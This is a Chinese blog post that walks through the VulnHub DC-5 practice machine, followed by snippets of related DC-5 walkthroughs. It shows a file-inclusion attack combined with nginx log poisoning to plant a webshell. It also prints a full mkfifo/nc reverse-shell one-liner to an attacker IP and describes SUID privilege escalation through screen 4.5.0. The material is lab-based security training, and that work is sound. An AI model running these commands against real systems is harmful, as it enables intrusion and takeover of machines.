【DC系列打穿靶机】DC-5靶机妈生教程!

已于 2024-11-28 16:20:24 修改
阅读量692 收藏 8
点赞数 16
文章标签: linux 安全
于 2024-11-28 16:19:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_53419560/article/details/144094951
版权

【DC系列打穿靶机】DC-5全详解

声明:该笔记为up主 泷羽的课程笔记,本节链接指路
警告:本教程仅作学习用途,若有用于非法行为的,概不负责。

启动!

一上来就查一下ip和端口:
在这里插入图片描述
查了一下目录,翻了一下页面没找到注入点:
在这里插入图片描述
换了一个,还是dirsearch好使:
在这里插入图片描述
记住这里的footer,后面有大用。
找到了可以注入的地方:
在这里插入图片描述
随便写了点东西提交:
在这里插入图片描述
再刷新,发现居然下面的copyright变了,是不是有上传漏洞。
在这里插入图片描述
搜footer这个php,发现居然是个随机刷新时间的php,确定了这里是一个注入点。
可以利用
在这里插入图片描述

漏洞利用

如果是文件包含漏洞的话,那…
在这里插入图片描述
就这么出现了,上课:

包含nginx日志文件
在Linux系统中,Nginx的默认日志文件位置通常可以在Nginx的配置文件中找到。以下是一些关于Nginx默认日志文件位置的信息:

  • 访问日志(Access Log):默认情况下,Nginx的访问日志通常存储在/var/log/nginx/access.log文件中。这个文件记录了所有访问服务器的请求信息,包括请求的时间、请求的URL、访问者的IP地址等。
  • 错误日志(Error Log):默认情况下,Nginx的错误日志通常存储在/var/log/nginx/error.log文件中。这个文件记录了Nginx服务器的错误信息,如请求出错、服务器无法响应等。

进入这个路径下,确实包含了这个文件。
在这里插入图片描述

一句话木马

在这里插入图片描述

让我们在两个文件里面找找看有没有他的踪迹,没找到!说明上传成功了嘿嘿
在这里插入图片描述
连接成功。

反弹shell!

现在拿到了他的后台,那我们就可以进行一个操作了,打开终端:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.216.132 23333 >/tmp/f

前面如果显示没有这个文件的话可以去tmp目录下创一个php,然后重试,连上啦
在这里插入图片描述
另一种方法,在靶机输入nc命令连接也可以,但如果对面没有nc的话就不行。上面是原始的一种方法。

漏洞利用

我们进来之后第一件事,先搞个交互:

python -c 'import pty; pty.spawn("/bin/bash")'

然后查看有什么可以利用的具有SUID的文件:

find / -perm -4000 -print 2>/dev/null

在这里插入图片描述
就可以看到一个叫screen-4.5.0和上一次利用的exim4,这次试试screen。

screen 是一个在 Unix 和类 Unix 系统上使用的终端多路复用器。

在这里插入图片描述
找到一个41154的脚本,可以试试。
找到这个脚本的位置,打开上传:
在这里插入图片描述
这里要转移到tmp的文件夹下才可以下载,普通用户没有权限。
在这里插入图片描述
正常提权,就可以拿到flag了。
在这里插入图片描述

【vulnhub】---DC-5靶机
qq_43168364的博客
08-21 475
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机DC-5靶机(192.168.15.) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 命令:arp-scan -l 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 收集到的相关信息: *
DC系列打穿靶机DC-1靶机教程
m0_53419560的博客
11-19 1139
声明:该笔记为up主的课程笔记,本节链接。警告:本教程仅作学习用途,若有用于非法行为的,概不负责。
DC5靶机
qq_40646572的博客
05-04 419
信息收集 开启dc5靶机。 先使用nmap扫描网段,发现dc5靶机,192.168.85.132.该靶机开启了 80端口以及111端口。 使用nmap未曾识别出端口服务。 web服务攻击 打开80服务的http服务。 大致看了下web服务的各项功能,发现concat页面中存在数据交互。 多次进行数据提交后,发现提交后的页面下面的Copyright ©数字一直在变动,怀疑此处有问题。 先尝试将存在参数交互的地方,尝试下sql注入。使用sqlmap跑一下,发现没有不存在注入点。 同时,扫描下目录。
DC-5靶场
最新发布
2301_76794492的博客
03-05 968
靶机下载地址:[https://www.vulnhub.com/entry/dc-5,314/]
DC-5靶机
weixin_45778886的博客
03-18 1399
下载安装 靶场下载地址:https://download.vulnhub.com/dc/DC-5.zip 信息收集 存后活主机探测 nmap -sP 192.168.124.0/24 端口服务探测 nmap -A 192.168.124.25 全端口扫描 nmap -sS 192.168.124.25 -p 1-65535 目录扫描 python3 dirsearch.py -u http://192.168.124.25/ -e* -i 200 网站服务探测 猜测可能存在文件包含 漏
DC系列打穿靶机DC-8靶机教程
m0_53419560的博客
12-04 1014
声明:该笔记为up主的课程笔记,本节链接。警告:本教程仅作学习用途,若有用于非法行为的,概不负责。
DC系列打穿靶机DC-4靶机教程
m0_53419560的博客
11-26 567
声明:该笔记为up主的课程笔记,本节链接。警告:本教程仅作学习用途,若有用于非法行为的,概不负责。
DC系列打穿靶机DC-3靶机教程
m0_53419560的博客
11-21 1061
声明:该笔记为up主的课程笔记,本节链接。警告:本教程仅作学习用途,若有用于非法行为的,概不负责。
VulnHub靶机 DC-5 打靶 渗透测试详细过程
网络空间安全学习
04-18 1442
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
vulnhub之DC5靶机
LainWith的博客
08-15 677
靶机概览信息收集nmap信息收集网站信息收集探测漏洞目录探测文件包含渗透攻击找出日志服务器一句话木马提权反弹shell交互式shell辅助工具提取手工执行脚本拿flag 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-5,314/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先查看一下DC5的M.
DC靶机系列DC-5
Ays.Ie的博客
02-27 558
本篇文章为DC系列5靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
靶机实战(DC-5)
weixin_45605313的博客
07-01 568
DC-5实验环境实验过程信息收集主机发现端口扫描服务发现网站指纹目录扫描漏洞发现漏洞利用提权总结 实验环境 靶机DC-4 测试机:kali(IP:192.168.186.128),win10 实验过程 信息收集 主机发现 netdiscover -I eth0 -r 192.168.186.0/24 nmap -sn 192.168.186.0/24 arp-scan -l ,arp-scan 192.168.186.0/24 端口扫描 服务发现 网站指纹 目录扫描 dribuster:使用/u
渗透测试学习之靶机DC-5
xdbzdgx的博客
11-18 6049
1.下载靶机 本篇文章是DC靶机系列的第五篇,针对的是靶机DC-5,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-5的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 同样地,DC-5只有一个flag。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到roo.
067 渗透测试实战,靶机 DC-5
鸡蛋炒鸡蛋
05-27 1551
文章目录一:环境准备二:nmap扫描三:御剑扫描网站 一:环境准备 下载:点我 下载之后完成安装,过程详情请参考,063 渗透测试实战,靶机 DC-1 需要抓包软件bp,文件的下载安装可以参考我的 前面的内容 :047 Burp Suite的详细安装与使用 打开DC-5,建议把虚拟机升级到15.5.7,我之前的虚拟机做这个dc靶机实验的时候经常电脑蓝屏。   二:nmap扫描 扫描局域网主机号 nmap -sP 192.168.100.0/24 -oN nmap.sP 扫描端口号 nmap
vulnhub-dc5靶机
bqnagus
09-30 200
vulnhub-dc5靶机复现
DC-5 靶机实战
PigLL的博客
08-22 774
DC-5 靶机实战 实验环境: 靶机DC-5 攻击机:kali 使kali和DC-5在同一网段,都在NAT模式下 1.信息收集: 首先确定kali的IP 扫描同网段存活的主机 因为kali的IP为192.168.137.136 所以确定DC-5靶机的IP为192.168.137.143 对DC-5进行端口扫描 ...
DC-1靶机渗透测试攻略及DC-2靶机简介
靶机DC-2,尽管在标题和描述中未被提及,但从文件名称列表中可以得知,它也是Vulnhub系列中的一个靶机。根据名称推断,DC-2可能与DC-1具有相似的主题或设计理念,但具体细节和挑战会有所差异,测试人员在面对DC-2时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值